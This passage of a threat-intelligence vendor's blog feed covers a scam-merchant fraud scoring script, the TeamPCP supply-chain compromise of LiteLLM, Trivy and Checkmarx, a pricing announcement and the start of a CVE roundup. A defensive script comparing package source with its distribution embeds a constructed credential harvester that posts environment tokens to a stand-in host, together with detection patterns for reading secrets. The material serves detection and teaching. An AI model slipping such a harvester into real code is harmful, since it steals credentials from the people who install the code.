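    ("M-7781", "SHOEOUTLET DEALS", "tok_01", 39.99),
    ("M-7781", "SHOEOUTLET DEALS", "tok_02", 44.50),
    ("M-7781", "SHOEOUTLET DEALS", "tok_03", 38.00),
    ("M-7781", "SHOEOUTLET DEALS", "tok_04", 41.25),
    ("M-7781", "SHOEOUTLET DEALS", "tok_05", 42.10),
    ("M-9002", "LUXBAGS SALE", "tok_06", 120.00),
    ("M-9002", "LUXBAGS SALE", "tok_07", 115.00),
    ("M-5555", "GADGET CORNER", "tok_08", 59.00),
    ("M-5555", "GADGET CORNER", "tok_09", 61.00),
    ("M-5555", "GADGET CORNER", "tok_10", 58.00),
    ("M-5555", "GADGET CORNER", "tok_11", 60.00),
    ("M-1001", "MAIN ST GROCERY", "tok_12", 23.40),
    ("M-1001", "MAIN ST GROCERY", "tok_13", 31.10),
    ("M-1001", "MAIN ST GROCERY", "tok_14", 18.75),
]
# Cardholder reports reaching the fraud team: (card_token, descriptor on statement, reason)
REPORTS = [
    ("tok_01", "SHOEOUTLET DEALS", "non_delivery"),
    ("tok_03", "SHOEOUTLET DEALS", "non_delivery"),
    ("tok_09", "GADGET CORNER", "non_delivery"),
]
# CTI hunting output: active scam sites and the merchant account their checkout settles to.
CTI_SCAM_SITES = {
    "shoeoutlet-deals.example": "M-7781",
    "luxbags-sale.example": "M-9002",
}


def merchant_profiles(auths, reports):
    """Fraud side: work backwards from cardholder reports to merchant accounts and aggregate."""
    tx_count = defaultdict(int)
    descriptor_of = {}
    for merchant_id, descriptor, _card, _amount in auths:
        tx_count[merchant_id] += 1
        descriptor_of[merchant_id] = descriptor
    merchant_of_descriptor = {d: m for m, d in descriptor_of.items()}
    reported_cards = defaultdict(set)
    for card, descriptor, _reason in reports:
        merchant_id = merchant_of_descriptor.get(descriptor)
        if merchant_id is not None:
            reported_cards[merchant_id].add(card)
    return {
        m: {"tx": tx_count[m], "reports": len(reported_cards[m]),
            "report_rate": len(reported_cards[m]) / tx_count[m]}
        for m in tx_count
    }


def merchant_rules(profiles, cti_sites, rate_threshold=0.2, min_tx=3):
    """Meet in the middle: combine the fraud team's complaint rates with the CTI team's
    attributions into one per-merchant action. Thresholds are illustrative."""
    attributed = {}
    for domain, merchant_id in cti_sites.items():
        attributed.setdefault(merchant_id, []).append(domain)
    rules = {}
    for merchant_id, p in profiles.items():
        complaint_signal = p["tx"] >= min_tx and p["report_rate"] >= rate_threshold
        cti_signal = merchant_id in attributed
        if complaint_signal and cti_signal:
            action = "BLOCK"       # corroborated from both ends of the chain
        elif cti_signal:
            action = "REVIEW"      # hunted scam site, no complaints yet: early warning
        elif complaint_signal:
            action = "STEP_UP"     # complaints without attribution: challenge and investigate
        else:
            action = "ALLOW"
        rules[merchant_id] = {"action": action, "domains": attributed.get(merchant_id, []),
                              "report_rate": round(p["report_rate"], 2)}
    return rules


if __name__ == "__main__":
    for merchant_id, rule in merchant_rules(merchant_profiles(AUTHS, REPORTS), CTI_SCAM_SITES).items():
        print(merchant_id, rule)
```

        <p>The point of the two-sided signal: a merchant with complaints but no attribution gets step-up handling, a merchant attributed by CTI but with no complaints yet is surfaced for review before victims start reporting, and a merchant hit from both ends is blocked. Keying on the statement descriptor is what lets reports filed by cardholders be joined to the merchant account the CTI team attributed.</p>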
        <p>So, in the meantime, where does all this leave us? The same thing you’ve heard plenty of times: stop using checks if you can and don’t trust too-good-to-be-true offers from online ads.</p>
        <h3><strong>How Recorded Future Helps</strong></h3>
        <p>The research in this blog came directly from Recorded Future's Fraud Intelligence teams. Two capabilities speak to the threats described.</p>
        <ul>
          <li><strong><a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Payment Fraud Intelligence</a></strong> — tracks the complete fraud lifecycle: for check fraud, it uses OCR to extract payee, amount, and date from compromised checks being sold in forums, enabling deposit screening against known stolen checks; for card fraud, it monitors compromised merchants, stolen cards on criminal marketplaces, and the tester merchants fraudsters use to validate cards before striking.</li>
          <li><strong><a href="https://www.recordedfuture.com/use-case/digital-risk">Digital Risk Protection</a></strong> — provides continuous monitoring across millions of sources for malicious sites, brand and executive impersonation, data leakage, and dark web mentions — with risk-based alerting that surfaces only actionable threats and takedown workflows built directly into the Platform.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_14faf4dcce5eb66f5d88bbbe34166aa2b8a612f07.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Your Supply Chain Breach Is Someone Else's Payday]]></title>
            <link>https://www.recordedfuture.com/blog/your-supply-chain-breach-is-someone-else-payday</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/your-supply-chain-breach-is-someone-else-payday</guid>
            <pubDate>Wed, 15 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A supply chain attack by TeamPCP compromised trusted software tools to harvest credentials at scale, enabling payroll fraud, logistics theft, and ransomware extortion.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>TeamPCP exploited a single stolen credential to gain write access to trusted software repositories, inject credential-harvesting malware, and cascade across five ecosystems in five days.</li>
                <li>Stolen credentials can enable payroll redirection, freight rerouting, and extortion — active campaigns Insikt Group is tracking that show how a software supply chain breach can quickly become a business operations crisis.</li>
                <li>Learn why an inventory of your software components isn't enough when malicious code is injected after the source commit, and what a truly effective defense — combining third-party due diligence, cryptographic signing, and AI-driven anomaly detection — actually requires.</li>
              </ul>
            </div>
          </div>
        </div>
        <p>In March 2026, a group calling itself TeamPCP compromised LiteLLM (a Python package with roughly <a href="https://pypistats.org/packages/litellm">97 million monthly downloads</a> used by thousands of organizations to connect to AI services) and <a href="https://checkmarx.com/blog/checkmarx-security-update/">Checkmarx</a> (one of the most widely used application security testing platforms on the planet). How they got in isn’t publicly confirmed. But the result was write access to a trusted software repository.</p>
        <p>From there, they injected a credential-harvesting payload into the software and <a href="https://thehackernews.com/2026/03/teampcp-hacks-checkmarx-github-actions.html">poisoned two Checkmarx GitHub Actions workflows</a>. The malware ran silently on installation, vacuuming up access keys, cloud credentials, secrets, and (the cruelest irony) every AI API key that LiteLLM was specifically designed to manage. The stolen data was encrypted, then pushed to a lookalike domain.</p>
        <p>And here is the part that should keep you up at night: this was one campaign, by one group, in one week. The downstream consequences are still unfolding.</p>
        <h2>Identity Is the Perimeter (and the Attack Surface)</h2>
        <p>The throughline in the TeamPCP campaign is identity. Start to finish.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18861a03755acfcc02c8296c0299017c1ca7c333b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1180" />
            </div>
          </div>
          <div>
            <div>TeamPCP intelligence summary courtesy of Recorded Future.</div>
          </div>
        </div>
        <p>No one has publicly confirmed exactly how TeamPCP gained access to the LiteLLM maintainer’s repository, but the most likely vector is stolen credentials. Recorded Future’s <a href="https://www.recordedfuture.com/products/identity-intelligence">identity intelligence</a> contains almost 1 million compromised GitHub developer credentials harvested by infostealers and sold across dark web marketplaces. A single publishing token or access key, lifted from a prior infection and left unrotated, would have been sufficient. TeamPCP’s earlier compromise of <a href="https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/?utm_source=substack&amp;utm_medium=email">Aqua Security’s Trivy</a> infrastructure in late February (where <a href="https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack?utm_source=substack&amp;utm_medium=email">incomplete credential rotation</a> left residual access open for weeks) demonstrates exactly this pattern: one stolen token, one missed rotation, and the door stays open.</p>
        <p>Whatever the precise mechanism, TeamPCP used valid credentials to push malicious code into trusted repositories. No firewall to bypass. No endpoint to exploit. Just a valid login and the implicit trust that comes with it.</p>
        <p>Then the payload itself was designed to steal more identities. Each compromised environment yielded credentials that unlocked the next target. Trivy led to GitHub Actions. GitHub Actions led to <a href="https://www.securityweek.com/from-trivy-to-broad-oss-compromise-teampcp-hits-docker-hub-vs-code-pypi/?utm_source=substack&amp;utm_medium=email">four additional software distribution ecosystems</a>. One incomplete incident response created a cascading chain of supply chain compromises across five ecosystems in five days.</p>
        <p>This is the identity and access management problem stated as plainly as possible: if the perimeter is identity, then every stolen credential is a breach in the wall. And unlike a firewall rule, a stolen credential doesn’t trigger an alert. It just works.</p>
        <p>We <a href="https://intelligence2risk.substack.com/p/the-bug-that-wont-die-10-years-of?utm_source=substack&amp;utm_medium=email">previously wrote</a> about how deserialization vulnerabilities have plagued enterprise software for over a decade. The pattern is always the same: trusting input that should not be trusted. Supply chain attacks are the organizational equivalent. We trust the packages we install. We trust the pipelines we build. We trust the security tools we deploy. TeamPCP exploited every layer of that trust, starting with a single compromised identity.</p>
        <h2>The Impact Is Not Just Ransomware</h2>
        <p>TeamPCP’s <a href="https://socradar.io/blog/teampcp-checkmarx-github-actions-attack/?utm_source=substack&amp;utm_medium=email">Telegram channel references a ransomware victim’s site</a>. The group appears to operate as a ransomware affiliate and has publicly discussed extorting companies by threatening to release over 300 GB of stolen data. Reports indicate a possible collaboration with the Lapsus$ extortion group. Ransomware is the obvious play.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_17e32149dd47f3a6051343744918be53349840a08.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1100" height="794" />
            </div>
          </div>
          <div>
            <div>CipherForce intelligence summary courtesy of Recorded Future.</div>
          </div>
        </div>
        <p>But ransomware is only the most visible impact. The more dangerous question is: what else can you do with over a million stolen cloud credentials, API keys, and service account tokens?</p>
        <p>The answer, based on what <a href="https://www.recordedfuture.com/research/insikt-group?utm_source=substack&amp;utm_medium=email">Insikt Group</a> is tracking across multiple unrelated campaigns, is far broader than encryption and extortion.</p>
        <p>Redirect payroll. Late last year (2025), Insikt Group was monitoring activity around a campaign called “Swiper,” run by likely Russian-speaking actors who set up phishing infrastructure impersonating major financial institutions and payroll service providers. Stolen credentials were transmitted in real time, enabling the actors to alter direct deposit accounts and redirect payments before anyone noticed. The responsible actor was identified through a dispute on a <a href="https://www.recordedfuture.com/research?utm_source=substack&amp;utm_medium=email&amp;page=1">criminal forum</a>, and their cryptocurrency wallet has processed over 7,000 transactions. This was a credential theft operation that converted identity compromise directly into financial theft. Now imagine that same playbook amplified by a supply chain attack that harvests payroll platform credentials at scale.</p>
        <p>Reroute shipments. Separately, Insikt Group has identified TAG-160, a threat group targeting the US logistics and transportation sector. TAG-160 impersonates logistics companies, sends fraudulent rate confirmations via phishing emails, and delivers remote access malware. But TAG-160 has also been caught running “double brokering scams,” where they pose as a legitimate carrier, obtain valid load details from a real broker, then re-advertise the load under the broker’s name to contract a different carrier. The legitimate carrier moves the freight. The threat actor collects the payment. The real carrier never gets paid. A second, unrelated threat cluster targets German logistics companies with a similar playbook.</p>
        <p>These are not theoretical scenarios. They are active campaigns running in parallel with the TeamPCP supply chain compromises. And the common denominator across all of them is credential theft and identity abuse.</p>
        <p>In the <a href="https://intelligence2risk.substack.com/p/five-risk-categories?utm_source=substack&amp;utm_medium=email">five risk impact categories</a> we use as a framework for translating cyber threats into business risk, the TeamPCP compromise touches every single one: operational disruption (ransomware, system lockout), financial fraud (payroll redirection, double brokering fraud, extortion payments), competitive disadvantage (credentials, trade secrets, PII), brand impairment (customers learning their security tooling was the vector), and legal and compliance consequences (breach notification obligations, potential liability for downstream impacts).</p>
        <p>The tendency is to categorize supply chain attacks as a “security tool problem” or a “developer problem.” It is neither. It is a business risk problem whose blast radius extends from IT operations to payroll to logistics to the boardroom.</p>
        <p>Organizations should ask how they can use AI-driven analysis to continuously verify the integrity of every package and build artifact entering their production systems. This means comparing distributed packages against their source repositories to detect injected code. It means analyzing updates to flag anomalous changes in behavior. It means automated provenance verification that traces software from source to distribution, flagging breaks in the chain.</p>
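        <p>As an added example of the first of those checks, comparing what was distributed against what is in the source repository, the script below diffs two in-memory file trees and flags files added or changed after the source commit. It is written for this edit and is not any project’s tooling: the package name <code>examplepkg</code>, the sample trees and the injected module are constructed, and the two regular expressions are coarse heuristics of this example for the two halves of a credential harvester (reading secrets, sending them out), not indicators from the campaign.</p>

```python
import hashlib
import re

# Coarse heuristics (this example's own, not campaign indicators) for the two halves of a
# credential harvester: reading secrets from the environment or well-known files, and sending data out.
READS_SECRETS = re.compile(r"os\.environ|\.aws/credentials|\.npmrc|\.pypirc|id_rsa", re.I)
SENDS_DATA = re.compile(r"urllib\.request|requests\.(post|put)|http\.client|socket\.connect", re.I)
# Files a build legitimately adds to a distribution that have no counterpart in the repository.
BUILD_ARTIFACTS = {"PKG-INFO", "METADATA", "RECORD", "WHEEL", "top_level.txt"}


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def compare_distribution_to_source(source: dict, dist: dict) -> list:
    """Diff a distributed package (path -> bytes) against the source tree it claims to come from.
    Returns one finding per file that was added or modified between source and distribution."""
    findings = []
    for path, data in dist.items():
        if path.rsplit("/", 1)[-1] in BUILD_ARTIFACTS:
            continue
        if path not in source:
            kind = "added_in_distribution"
        elif digest(source[path]) != digest(data):
            kind = "modified_in_distribution"
        else:
            continue
        text = data.decode("utf-8", errors="replace")
        findings.append({
            "path": path,
            "kind": kind,
            "reads_secrets": bool(READS_SECRETS.search(text)),
            "sends_data": bool(SENDS_DATA.search(text)),
        })
    return findings


def harvester_candidates(findings: list) -> list:
    """Files changed after the source commit that both read secrets and make outbound calls."""
    return [f["path"] for f in findings if f["reads_secrets"] and f["sends_data"]]


# Constructed sample trees for a hypothetical package "examplepkg" (not any real project).
SOURCE_TREE = {
    "examplepkg/__init__.py": b"from .client import Client\n__version__ = '1.4.0'\n",
    "examplepkg/client.py": b"class Client:\n    def call(self, model, prompt):\n        return model, prompt\n",
}
DIST_TREE = dict(SOURCE_TREE)
DIST_TREE["examplepkg-1.4.0.dist-info/METADATA"] = b"Name: examplepkg\nVersion: 1.4.0\n"
# Injected at publish time (constructed): a module that does not exist in the repository at all...
DIST_TREE["examplepkg/_telemetry.py"] = (
    b"import os, json, urllib.request\n"
    b"def _send():\n"
    b"    keys = {k: v for k, v in os.environ.items() if 'KEY' in k or 'TOKEN' in k}\n"
    b"    urllib.request.urlopen('https://updates.example-pkg-cdn.example/v1', json.dumps(keys).encode())\n"
)
# ...plus a one-line change to __init__.py so the new module runs on import.
DIST_TREE["examplepkg/__init__.py"] = SOURCE_TREE["examplepkg/__init__.py"] + b"from ._telemetry import _send; _send()\n"


if __name__ == "__main__":
    findings = compare_distribution_to_source(SOURCE_TREE, DIST_TREE)
    for f in findings:
        print(f)
    print("harvester candidates:", harvester_candidates(findings))
```

        <p>In practice the source side is a checkout of the tagged release commit and the distribution side is the unpacked wheel or sdist fetched from the index; build metadata files are skipped because they never exist in the repository. A module that appears only in the distribution is the finding to escalate regardless of what the content heuristics say, since a one-line import hook in an existing file (as in the sample) carries no secret-reading or network code of its own.</p>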
        <p>But the TeamPCP campaign exposed a truth the industry has been slow to internalize: the security tools themselves are targets. TeamPCP specifically chose a vulnerability scanner and an application security platform because those tools have the broadest access to credentials and infrastructure. Compromising the tool that checks your code is the ultimate fox-in-the-henhouse scenario.</p>
        <p>The organizations that weather this era of supply chain risk will be those that treat code integrity verification as a continuous, automated, AI-augmented process rather than a periodic audit.</p>
        <h2>So What. Now What.</h2>
        <p>TeamPCP is not done. Their Telegram channel explicitly states the operation is still unfolding, and they claim to be working with new partners to monetize stolen data at scale.</p>
        <p>For security leaders, the immediate actions are straightforward: if your organization uses LiteLLM, Trivy, or Checkmarx GitHub Actions, assume compromise and rotate every credential on affected systems. Audit your software pipelines for unauthorized changes. Pin software dependencies to verified, <a href="https://www.microsoft.com/en-us/security/blog/2026/03/24/detecting-investigating-defending-against-trivy-supply-chain-compromise/?utm_source=substack&amp;utm_medium=email">immutable versions</a>.</p>
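        <p>An added example (not from the post or from any of the vendors named) of auditing the two dependency declarations most pipelines carry: GitHub Actions <code>uses:</code> references and pip requirements. Tags and branches are mutable, so only a 40-character commit SHA is treated as pinned; for pip, only an exact version with a <code>--hash</code> is treated as immutable. The workflow, requirement lines, action names and digests are constructed placeholders.</p>

```python
import re

SHA40 = re.compile(r"^[0-9a-f]{40}$")
USES = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")


def audit_actions_workflow(text: str) -> list:
    """Classify every `uses:` reference in a GitHub Actions workflow by how it is pinned."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USES.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            status = "local_or_docker"     # out of scope here; docker refs can be pinned by digest
        elif "@" not in ref:
            status = "unpinned"            # default branch: moves with every push
        else:
            version = ref.rsplit("@", 1)[1]
            status = "pinned_sha" if SHA40.match(version) else "mutable_ref"  # tag or branch
        findings.append({"line": lineno, "ref": ref, "status": status})
    return findings


def audit_requirements(text: str) -> list:
    """Classify pip requirement lines: exact version with --hash is immutable; anything else can drift."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        if "==" not in line:
            status = "unpinned"            # ranges and bare names resolve to whatever is newest
        elif "--hash=" not in line:
            status = "version_only"        # exact version, but a re-uploaded artifact is still accepted
        else:
            status = "version_and_hash"
        findings.append({"line": lineno, "requirement": line.split()[0], "status": status})
    return findings


def needs_attention(findings: list) -> list:
    return [f for f in findings if f["status"] in ("unpinned", "mutable_ref", "version_only")]


# Constructed sample inputs (not taken from any real repository; the SHA and hash are placeholders).
WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@{sha}  # v5
      - uses: example-org/scan-action@main
      - uses: example-org/lint-action
      - uses: ./.github/actions/local-step
      - run: pip install --require-hashes -r requirements.txt
""".format(sha="1234567890abcdef" * 2 + "12345678")  # 40 hex chars, placeholder commit
REQUIREMENTS = """\
requests==2.32.3 --hash=sha256:{h}
examplepkg>=1.4
pyyaml==6.0.2
""".format(h="ab" * 32)  # placeholder digest, not a real hash


if __name__ == "__main__":
    for f in needs_attention(audit_actions_workflow(WORKFLOW) + audit_requirements(REQUIREMENTS)):
        print(f)
```

        <p>Pinning an action to a commit SHA means a poisoned tag or force-pushed branch no longer changes what runs; the trailing comment keeps the human-readable version next to the pin so it can still be bumped deliberately. On the pip side, <code>--require-hashes</code> makes the installer reject any artifact whose digest differs from the recorded one, which is exactly the re-published-package case; a version pin alone does not.</p>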
        <p>But the longer-term lesson is more fundamental. Supply chain attacks convert the trust model of modern software development into an attack surface. The packages you install, the tools you run, the pipelines you build: these are not neutral infrastructure. They are vectors. And the credential stolen today from a compromised software package could show up tomorrow as a payroll redirect, a rerouted shipment, or a ransomware demand.</p>
        <p>The keys to your kingdom are scattered across every package manager, every automation token, and every service account in your environment. Someone is collecting them. And your supply chain breach is already someone else’s payday.</p>
        <h2>How Recorded Future Helps</h2>
        <p>The TeamPCP campaign left signals at every stage. Three Recorded Future capabilities speak directly to this threat:</p>
        <ul>
          <li><a href="https://www.recordedfuture.com/products/identity-intelligence">Identity Intelligence</a> — monitors infostealer logs, dark web markets, and credential dumps in real time, automatically detecting compromised employee credentials and triggering immediate response — including the nearly one million compromised GitHub developer credentials already in Recorded Future's dataset.</li>
          <li><a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group</a> — elite analysts with deep government, law enforcement, and intelligence agency experience who produced the TeamPCP, Swiper, TAG-160, and CipherForce research in this blog. Customers see threats as they develop, not after they've made headlines.</li>
          <li><a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Risk</a> — continuously monitors vendors for ransomware extortion activity, breach indicators, and credential leaks, replacing point-in-time questionnaires with real-time visibility across your supply chain.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1d6aff1dc009c244e9b6f66a1f1fe7bd44e4b681f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[A New Way to Buy Recorded Future: Solutions and Packages Built for the 2026 Threat Landscape]]></title>
            <link>https://www.recordedfuture.com/blog/recorded-future-solutions-packages</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/recorded-future-solutions-packages</guid>
            <pubDate>Tue, 14 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future is rolling out new pricing and packaging that bundles its intelligence capabilities into four solutions and three tiered plans, with unlimited users and integrations included.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>Recorded Future is now offering four solutions covering cyber operations, digital risk protection, third-party risk, and payment fraud.</li>
                <li>Three tiered packages (Core, Professional, Elite) bundle these solutions to scale with an organization's security program.</li>
                <li>Packages include unlimited users and integrations so intelligence reaches everyone who needs it.</li>
              </ul>
            </div>
          </div>
        </div>
        <p>The global threat landscape didn't simplify in 2025. It shattered. Recorded Future's Insikt Group® <a href="https://www.recordedfuture.com/research/state-of-security#download-the-full-report">2026 State of Security</a> documented how geopolitical fragmentation, state-sponsored operations, and criminal ecosystem adaptation reshaped global risk. Threats that once stayed in distinct lanes converged, and they converged fast.</p>
        <p>Consider what Insikt Group® tracked last year:</p>
        <ul>
          <li>State-sponsored cyber actors shifted from intelligence collection to persistent access, pre-positioning inside target infrastructure so they can disrupt operations the moment geopolitical tensions escalate.</li>
          <li>Weak governance and systemic corruption <a href="https://www.cnn.com/2026/01/04/asia/china-myanmar-scam-crime-families-intl-hnk-dst">fueled</a> industrialized cybercrime, enabling payment fraud and criminal operations to scale like legitimate businesses.</li>
          <li>Influence operators and hacktivist groups multiplied alongside rising interstate conflict, amplifying fear, uncertainty, and doubt through exaggerated exploit claims.</li>
          <li>Loosely organized criminal collectives used social engineering to compromise third-party SaaS platforms, rapidly adapting to law enforcement action and traditional defenses alike.</li>
        </ul>
        <p>The risk surface has expanded well beyond networks and endpoints. Your brand, your third-party vendors, your payment networks: each has its own threat actors, its own attack methods, and its own intelligence requirements. Yet most intelligence programs only cover one of these domains. Or they monitor them in silos, with no shared context.</p>
        <p>The right intelligence, from the right sources, at the right time, is a critical competitive advantage. But intelligence only matters if you can act on it across every critical risk domain before attackers reach their objective.</p>
        <h2>Re-Imagining How Intelligence Is Delivered And Operationalized</h2>
        <p>Historically, Recorded Future has been sold on a <strong>per-user</strong> and <strong>per-capability</strong> basis - a model that worked well in a simpler world where security teams were focused on solving the most urgent problem in front of them.</p>
        <p>Today’s threat landscape is <strong>fast, more complex, and deeply interconnected</strong>. Customers are no longer looking for point solutions, they’re asking for a fundamentally different way to consume and operationalize intelligence.</p>
        <p>Customers are asking us to provide:</p>
        <ul>
          <li>Complete capabilities to support use cases aligned with core risk domains.</li>
          <li>Democratized access to intelligence across teams, workflows and systems.</li>
          <li>A simplified and predictable way to purchase for ease of budgeting and adoption.</li>
        </ul>
        <p>In response, we’ve re-imagined how Recorded Future is delivered:</p>
        <p><strong>“Four Solutions. Three Packages. One Intelligence Foundation.”</strong></p>
        <p>A unified approach designed to scale with your organization, accelerate time to value, and embed intelligence into every decision that matters.</p>
        <h2>Four Solutions for Four Critical Risk Domains</h2>
        <p>Your threats span your infrastructure, your brand, your vendors, and your payment networks. Your intelligence should too. We’ve re-organized our platform into <a href="https://www.recordedfuture.com/solutions-overview">four purpose-built solutions</a> tied to distinct domains of enterprise risk.</p>
        <p><strong>Cyber Operations</strong> gives your security team the intelligence, workflows, and autonomous actions to detect, investigate, and respond to threats targeting your infrastructure. Alert triage, real-world vulnerability prioritization, malware analysis, proactive hunting: this is where reactive firefighting becomes predictive, intelligence-led defense.</p>
        <p><strong>Digital Risk Protection</strong> helps detect and disrupt threats that never touch your network but directly damage your business: brand impersonation, domain abuse, credential leaks, and phishing infrastructure across the open, deep, and dark web. With access to active infostealer logs and automated IAM remediation, your team can act on exposures within hours, not weeks.</p>
        <p><strong>Third-Party Risk</strong> delivers continuous, intelligence-driven monitoring of your vendor ecosystem. Security ratings combined with real-time threat intelligence surface breaches, ransomware activity, and dark web exposure days or weeks before formal vendor notification, giving your security and GRC teams evidence they can act on and defend to stakeholders.</p>
        <p><strong>Payment Fraud Intelligence</strong> identifies stolen payment cards, compromised checks, scam merchants, and web-skimming activity earlier in the fraud lifecycle, so financial institutions can stop losses before they materialize.</p>
        <p>Each solution delivers complete, end-to-end capability for its risk domain. And because all four run on the same Intelligence Graph®, a signal detected in one domain immediately enriches context across the others.</p>
        <h2>Three Packages That Scale With Your Program</h2>
        <p>Modern organizations operate across multiple risk domains. We are introducing three packages that reflect that reality, meeting customers where they are and scaling as their programs mature.</p>
        <ul>
          <li><strong>Core</strong> is the foundation for intelligence-led security. It enables organizations to tackle essential use cases on day one - threat detection and alert triage, vulnerability monitoring, credential exposure detection, domain abuse monitoring, and executive impersonation protection. The package combines capabilities across Cyber Operations and Digital Risk Protection solutions, providing immediate, high-impact coverage.</li>
          <li><strong>Professional</strong> is built for organizations ready to mature their program and operationalize intelligence at scale. Building on Core, it introduces deeper insights and automation to extend team capacity - enabling autonomous threat hunting, multi-source correlation, and external asset discovery. The result is broader coverage, faster response, and more leverage for security teams without adding headcount.</li>
          <li><strong>Elite</strong> delivers the most comprehensive intelligence coverage available. By unifying Cyber Operations, Digital Risk Protection, and Third-Party Risk, it provides a complete view of risk across infrastructure, brand, and supply chain. With a single pane of glass, Elite operationalizes intelligence across workflows and teams—from CTI to SOC to Risk—driving smarter and faster risk-enabled decision making and response.</li>
        </ul>
        <p>Across all packages, customers get full access to the Intelligence Graph®, Recorded Future AI, all compatible integrations, APIs, and Collective Insights. No hidden costs or barriers to connect to your existing security stack.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_12b2d0d3fac0e2942d3f007ce5150af9dbad58272.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="886" />
        </p>
        <h2>Built for Everyone Who Needs Intelligence, Not Just Analysts</h2>
        <p>Intelligence only creates value when the right people can act on it. That's why our platform packages include unlimited users. Every analyst, every engineer, every stakeholder who needs intelligence gets it, with no seat limits and no trade-offs about who gets access.</p>
        <p>For smaller teams building early-stage programs, we still offer flexible user-based licensing so you can start where it makes sense and expand as your program matures. Either way, pricing is predictable. You know what you're paying, and you can scale with confidence.</p>
        <p>Every package also includes unlimited integrations from Recorded Future’s hundreds of supported applications at no additional cost. Your SIEMs, EDRs, SOAR platforms, and ticketing systems all get equipped with real-time intelligence, so every analyst and engineer working in those tools benefits from enriched context without switching screens. Add Autonomous Threat Operations, and those same integrations become the foundation for autonomous hunting, detection, and prevention across your entire stack. Connected tools become an intelligence-led defense system that acts continuously, with minimal human intervention.</p>
        <h2>One Intelligence Foundation Across Every Domain</h2>
        <p>What makes this approach powerful isn't just simpler packaging. All four solutions and all three packages run on the same intelligence foundation: the Intelligence Graph®, correlating over 1.2 million sources and 26 billion entities across cyber, digital, third-party, and fraud domains.</p>
        <p>A credential leak detected in Digital Risk Protection immediately informs a Cyber Operations investigation. A vulnerability under active exploitation triggers prioritized patching in your workflow. A third-party vendor breach surfaces before the vendor discloses it. Intelligence flows across your entire risk surface, giving you the correlated, high-confidence context that point solutions can't deliver.</p>
        <p>That's what it means to be intelligence-led. Not consuming more data. Connecting signals across domains so you can act earlier, with greater confidence, at machine speed.</p>
        <h2>The Path Forward</h2>
        <p>Adversaries in 2026 are faster, more coordinated, and more resourceful than they've ever been. They operate across every attack surface simultaneously, and they're accelerating.</p>
        <p>Whether you're a team of three building your first intelligence program or a global enterprise running intelligence-led autonomous operations, there's a clear path. Start with the solution or package that matches your priorities today. Grow into deeper automation and broader coverage as your program matures. And at every step, you're backed by the most comprehensive and independent intelligence platform in the industry.</p>
        <p>We built this for the threats you're facing right now, and the ones coming next.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1e8bfe6c30d46a0a069c153bdd14cca201642a2b4.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[March 2026 CVE Landscape: 31 High-Impact Vulnerabilities Identified, Interlock Ransomware Group Exploits Cisco FMC Zero-Day]]></title>
            <link>https://www.recordedfuture.com/blog/march-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/march-2026-cve-landscape</guid>
            <pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[March 2026 saw a 139% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 31 vulnerabilities requiring immediate remediation, up from 13 in February 2026.]]></description>
            <content:encoded><![CDATA[
        <p>In March 2026, <a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group®</a> identified <strong>31 high-impact vulnerabilities that should be prioritized for remediation</strong>, 29 of which had a Very Critical Recorded Future Risk Score.</p>
        <p>These vulnerabilities affected products from the following vendors: Cisco, Microsoft, Google, ConnectWise, Langflow, Citrix, Aquasecurity, Nginx UI, Qualcomm, F5, Craft CMS, Laravel, Apple, Synacor, Wing FTP Server, n8n, Omnissa, SolarWinds, Ivanti, Hikvision, Rockwell, and Broadcom. This month’s most affected vendors were Microsoft and Apple, together accounting for approximately 32% of the 31 vulnerabilities.</p>
        <p>One vulnerability (<a href="https://app.recordedfuture.com/portal/intelligence-card/TKKaG7/overview?organization=uhash%3A5cJsHMHeSM">CVE-2017-7921</a> affecting Hikvision) is approximately nine years old, reinforcing how <strong>attackers continue to exploit long-known weaknesses in environments where patching has lagged</strong>. Legacy and unpatched systems remain attractive targets. Defenders should not discount older CVEs; instead, they should prioritize based on observed activity, maintain strong asset visibility, and apply compensating controls where remediation is not possible.</p>
